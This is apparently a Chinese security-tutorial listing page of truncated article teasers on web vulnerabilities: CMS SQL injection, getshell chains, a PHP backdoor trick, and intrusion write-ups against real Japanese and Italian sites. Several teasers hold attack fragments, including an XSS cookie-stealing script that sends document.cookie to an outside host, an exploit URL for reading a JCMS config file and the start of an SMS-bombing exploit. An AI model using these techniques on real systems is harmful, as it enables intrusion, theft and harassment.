TCCMS SQL注入漏洞(盲注) - 网站安全 - 自学php关注热度:17
app controller area class php中未对id进行处理,存在注入public function getCitys() { $aeraObj = M(area); $provinceId = $_GET[id]; 未进行任何处理 修复建议$pr..[详情]
朋友网查询QQ号漏洞(已修复) - 网站安全 - 自学关注热度:42
简要描述:通过固定代码朋友网秒查QQ号。详细说明:通过提取朋友网特征码,再加上一串固定代码。既可以秒查出对方的QQ空间。那QQ号码自然被获知。犯罪分子如果通过朋友网获知对..[详情]
metinfo多个漏洞(可getshell) - 网站安全 - 自学php关注热度:20
1、审计代码我一般喜欢先看核心文件。Download download txtdefine( MAGIC_QUOTES_GPC , get_magic_quotes_gpc());isset($_REQUEST[ GLOBALS ]) exit( Access Error );require_once ROOTPATH i..[详情]
Web应用程序安全必须重视八大问题 - 网站安全关注热度:16
对于任何一个项目,开始阶段对于交付安全的应用来说非常关键。适当的安全要求会导致正确的安全设计。下面讨论在分析Web应用程序的安全要求时需要考虑的八大问题。1、认证和口令..[详情]
拒绝“马后炮”:积极的应用程序安全需要四大关注热度:23
攻击者在成功利用了漏洞后,因跨站脚本攻击和SQL注入攻击而造成的安全事件已经不再是什么新鲜事儿了。为了防止此类攻击的发生,安全团队是否还抱着准备亡羊补牢的心态?高效的..[详情]
PHP中使用按位取反(~)函数创建后门 - 网站安全关注热度:18
1)PHP ~位运算符PHP:位运算符-http: www php net manual zh language operators bitwise php前一段时间老外在twitter上爆出个有趣的东西,一串疑似乱码的字符串访问后却能正常输出1337,于是便有了以下研..[详情]
shopnc 6.0单用户版本注入 - 网站安全 - 自学php关注热度:34
shopnc 6 0 单用户版本Shopnc 版本有点多啊 都不太记得是哪个了。ShopNCreg;天津网城科技有限公司Copyrightcopy; 2007-2009 ShopNC, Powered by ShopNC Team , All Rights Reserved津ICP备08000..[详情]
macCMS 全版本通杀SQL注射(包括最新7.x) - 网站安关注热度:19
本次针对官网最新7 7版本的maccms测试,和之前的6 x注射有一些差异(重构了代码,而且用了360给的防护脚本)结合之前无人认领的旧版注射,可以达到全版本注射 user index php line:615func..[详情]
MetInfo最新版SQL盲注 - 网站安全 - 自学php关注热度:60
MetInfo最新版SQL盲注漏洞,可盲注管理员信息。D: wamp www MetInfo5 2 img img php?php MetInfo Enterprise Content Management System Copyright (C) MetInfo Co ,Ltd (http: www metinfo cn)..[详情]
[安全科普]你必须了解的session的本质 - 网站安全关注热度:30
有一点我们必须承认,大多数web应用程序都离不开session的使用。这篇文章将会结合php以及http协议来分析如何建立一个安全的会话管理机制。我们先简单的了解一些http的知识,从而理解..[详情]
doorGets CMS 5.2 SQL注入 - 网站安全 - 自学php关注热度:15
官网:http: www doorgets com CVE:a href=http: cve mitre org cgi-bin cvename cgi?name=CVE-2014-1459Prime; rel=nofollow target=_blank2014-1459 aFROM:http: www exploit-db com exploits 3152..[详情]
PowerCDN官网SQL注入用户站点有被劫持风险 - 网站安关注热度:22
应官方要求已删除..[详情]
app漏洞挖掘之有宝在线SQL注入 - 网站安全 - 自学关注热度:18
这是一个post注入,按照zzR大牛的方法,用burp截获用手机登录时的数据包。POST user login?clientversion=4 3 1machine_type=MI+3os=4 2 1channel_id=1device_no=f8%3Aa4%3A5f%3A7f%3Abf%3Ac5imei=863637..[详情]
ShopEx某些服务器存在任意代码执行漏洞(可泄漏用关注热度:18
可执行命令,查看源码!php cgi漏洞http: shop322763 p13 shopex cn http: shop322763 p13 shopex cn ?-shttp: shop319398 p09 shopex cn ?-shttp: shop317459 p21 shopex cn ?-s尝试执行PHP代码,虽然有op..[详情]
Siteserver CMS SQL注入漏洞一枚(官网BBS中枪) - 网站安关注热度:120
Siteserver CMS 存在SQL注入漏洞,已测试官网论坛和多个互联网实例。漏洞链接:siteserver CMS console_tableMetadata aspx?ENName=cms_ContentTableType=BackgroundContent类型:盲注修复方案:过滤..[详情]
渗透日本神奈川大学站点 - 网站安全 - 自学php关注热度:79
信息探测:目标站点:http: icfcs xxxxx jp服务器IP:210 166 xxx 76(日本)环境平台:PHP 5 1 6服务器系统:Apache 2 2 3 (Red Hat)打开网站首页,随便的打开了一个链接,手工测试了下注入漏洞是否..[详情]
意大利网站后台POST注入记录 - 网站安全 - 自学关注热度:15
信息探测:目标站点:http: www sixxf it服务器IP:192 232 2xx 97(美国)环境平台:PHP服务器系统:Apache这次用网页探测这个站的信息不是很完整,直接奔主题吧,打开网站后台,在登录帐号..[详情]
phpcms前台和(后台低权限)getshell1 - 网站安全 - 自学关注热度:18
1、首先先说前台的吧,估计很多站都开始补了。是针对phpcms 2008的,二次攻击范畴,二次解析getshell。在upload_field php中br $upload_allowext = !empty($C[ 39;upload_allowext 39;]) ? $C[ 39;u..[详情]
xss如何加载远程js的一些tips - 网站安全 - 自学p关注热度:24
在早期 , 对于xss我们是这样利用的scriptwindow open( http: xxx xxx cookie asp?msg= +document cookie) script将 cookie之类的数据传递到自己的服务端但是 如果要更为复杂的攻击的话,由于字符串长..[详情]
大汉版通JCMS数据库配置文件读取 - 网站安全 - 自关注热度:58
由于读取xml文件时没有对传进的参数进行过滤,flowcode参数可控,配置文件地址WEB-INF config dbconfig xml,由于控制了文件后缀,只能读取xml文件EXP:http: www iswin org jcms workflow design readxml jsp..[详情]
JSONP安全防范解决方案新思路 - 网站安全 - 自学关注热度:45
jsonp安全性防范,分为以下几点:1、防止callback参数意外截断js代码,特殊字符单引号双引号,换行符均存在风险2、防止callback参数恶意添加标签(如script),造成XSS漏洞3、防止跨域请求..[详情]
ecshop漏洞分析 - 网站安全 - 自学php关注热度:20
昨天在wooyun上看了看 以前blue大牛发的ecshop的洞, 还有一些其他的不过有些没给出利用方法 自己来做个分析把。 新版本的应该都补了把。if (!get_magic_quotes_gpc()){ if (!empty($_GET))..[详情]
齐博CMS存储型XSS可getshell(组合利用) - 网站安全关注热度:24
齐博cms,利用威胁不大的前台存储型xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell 3个0day 结合起来的威力拿下齐博cms,虽然不算什么严重的漏洞,但是中途遇到的问题和突破还..[详情]
某XXX短信和电话轰炸 - 网站安全 - 自学php关注热度:47
某XXX短信验证码未做次数和安全校验漏洞,每请求一次便会自动发一封短信而且打一个电话。利用代码:%@ page language=java pageEncoding=UTF-8%%@ page isThreadSafe=false %%@ page import=..[详情]
fuzzing XSS filter - 网站安全 - 自学php关注热度:31
题记:这是09年自己写的总结文章,之后多年也不搞这个了,技术显然是过时了,但我觉得思路还是有用的,算抛砖引玉吧,各位见笑0x00 前言这是一篇学习总结,首先对几位未曾谋面也..[详情]
51CTO存在严重逻辑设计缺陷SHELL主站 - 网站安全关注热度:27
1 信息收集通过分析51cto com的网络结构,发现整体业务由多个分站构成,往往越多的系统会带来越多的安全问题,所以一个一个的摸索。~ linkphone cn 大面积使用PHPCMShttp: publish linkphone c..[详情]
phpcms v9 前台无限制GETSHELL(第一弹) - 网站安全关注热度:26
0x01:介绍PHPCMS V9(后面简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护..[详情]
派代网主站设计缺陷可删除任意文章 - 网站安全关注热度:22
注册了2个号。在主站可以直接发文章。然后我抓了包http: www paidai com managetopic php?action=user_del_topicboardid=47topicid=202807posterid=669387这是直接get操作 删除文章的。然后另外一个号 发一..[详情]
绕过网易oauth认证的redirect_uri限制劫持帐号token关注热度:206
这里是通过网易帐号登录56网的授权页面:https: api t 163 com oauth2 authorize?client_id=II5coZy8DdAtKt7aredirect_uri=http%3A%2F%2Fapp 56 com%2Fcooperate%2Findex php%3Faction%3DWeibo%26tag%3Dwy%26do..[详情]
Citrix XenApp越权访问 - 网站安全 - 自学php关注热度:38
一、简介Citrix XenApptrade;是一种按需应用交付解决方案,能够在数据中心对所有Windows应用实现虚拟化、集中部署和管理,并能作为一项服务、通过任何设备向所有用户交付应用。全世界共..[详情]
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com